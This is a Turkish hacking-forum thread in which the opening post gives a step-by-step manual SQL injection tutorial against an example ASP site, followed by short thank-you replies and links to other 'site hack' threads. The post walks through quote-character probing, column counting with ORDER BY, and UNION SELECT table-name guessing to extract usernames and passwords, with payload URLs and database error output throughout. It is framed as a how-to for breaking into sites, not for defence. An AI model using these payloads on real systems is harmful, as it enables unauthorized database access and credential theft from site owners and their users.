Konuyu Oyla:
  • Derecelendirme: 2.5/5 - 2 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Manuel site sql bulma
#1
hedef sitemiz bu olsun örneğin; http://www.pasificsql.com

bu sitede açık olup olmadığını anlamak için id= değerli linkler bulmaya çalışcağız,

örneğin;

http://www.pasificsql.com/news.asp?id=10

aha id= değerli link hemen bakıyoruz site sonuna 'a veya " gibi karakterler ekliyerek hata almaya çalısıyoruz

hatamızı aldık hatamız şudur arkadaşlar ;

Microsoft JET Database Engine error ’80040e14’

Syntax error in string in query expression ’id = 10";’.

/news.asp, line 7

" site sonuna koyunca yukardaki hatayı alıyorsak arkadaşlar sql var demekdir...

evet sql inj. var olduğunu gördük.şimdi ise sql inj. yapmamız için;
sitenin tablo adı,
kolon sayısını,
kolon adlarını,bilmemiz gerekmekdedir. ilk başta kolon sayısını bulalım;

kolon sayısını bulmak için +order+by+1 fonksiyonunu kullanacağız örnek;

http://www.pasificsql.com/news.asp?id=10+order+by+1

dedik sitenin herhangibir sayfası geldi karşımıza hata falan yok bu sql yok anlamına gelmiyor hata alana kadar devam... (:

http://www.pasificsql.com/news.asp?id=10+order+by+2 1 yerine 2
2 yerine 3 3 yerine 4 4 yerine 5..hata verene kadar devam.. hatamız şudur arkadaşlar ;


Microsoft JET Database Engine error ’80040e14’

The Microsoft Jet database engine does not recognize ’10’ as a valid field name or expression.

/news.asp, line 7

hatamiz budur arkadaşlar.

Devam edelim...

http://www.pasificsql.com/news.asp?id=10+order+by+8

dedik ekrana hata cıktı ozaman kolon sayımız 7 evet [hemen bulamayabiliriz ben örnek olarak 8 dedim]

Şimdi kolon sayısınıda bulduk ama, bir tek tablo adı ve o tablo adına uygun kolon adları kaldı.

+union+select+0,1,2,3,4,5,6,7+from+TabloAdı şeklinde deneyerek ulaşacağız tablo adımıza...


örnek : http://www.pasificsql.com/news.asp?i...,5,6+from+User

Dedik karşımıza hata çıktı diyelim çok normaldir panik yapmayın (: tablo adları çokdur yanlış girmiş olabiliriz...

tablo adlarının googledan ulaşabilrisiniz bazı tablo adları;

admin,admins,user,users,new,news

evet bizimkinin tablo adı news olsun;

http://www.pasificsql.com/news.aspid...,5,6+from+news

dedik kolon sayımı sayılarımız ekrana vurdu pat diye (:

ekranda yazan sayı diyelim 5 ile 6 olsun 5,6 yerine

5 yerine username
6 yerine password


yazarak ulaşabiliriz...

tamam pasific yazdık username,password'da bişey olduğu yok ne olcak bu ? diyebilirsiniz...

eğer olmassa isimler farklıdır

username yerine;

usname,name,uname olabilir.

password yerine;

upass,pas,uspass olabilir. deneyerek ulaşabilirsiniz...
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#2
teşekkürler lazım olan birşeydi kiss
Beğenenler:
#3
Eyvallah exciting
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#4
eline sağlık doğu exciting
Beğenenler:
#5
Eyvallah exciting
En büyük acizlik,kendinden başkası gibi görünmektir.
Beğenenler:
#6
Ellerine Sağlık.
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Yeni Kolay Site Hack :) ByMuh4mm3d 207 5,542 09-12-2016, Saat: 19:44
Son Yorum: anubis
  Tv site dorkları Mrxxx 1 30 07-12-2016, Saat: 17:32
Son Yorum: the_zizil
  PHP ile IP Adresini Dosya yada Site Üzerinden Loglatmak KingSkrupellos 11 121 07-12-2016, Saat: 09:43
Son Yorum: the_zizil
  Log Açığı İle Site Hackleyin! B3lirsiz 298 14,352 01-12-2016, Saat: 14:56
Son Yorum: GoldenArrow
  Android İle Site Hack | Muhteşem Özellikler ERTUĞRUL 65 1,765 17-11-2016, Saat: 16:17
Son Yorum: berat00
Anahtar Kelimeler

Manuel site sql bulma indir, Manuel site sql bulma Videosu, Manuel site sql bulma Online izle, Manuel site sql bulma Bedava indir, Manuel site sql bulma Yükle, Manuel site sql bulma Hakkında, Manuel site sql bulma Nedir, Manuel site sql bulma Free indir, Manuel site sql bulma Oyunu, Manuel site sql bulma Download


1 Ziyaretçi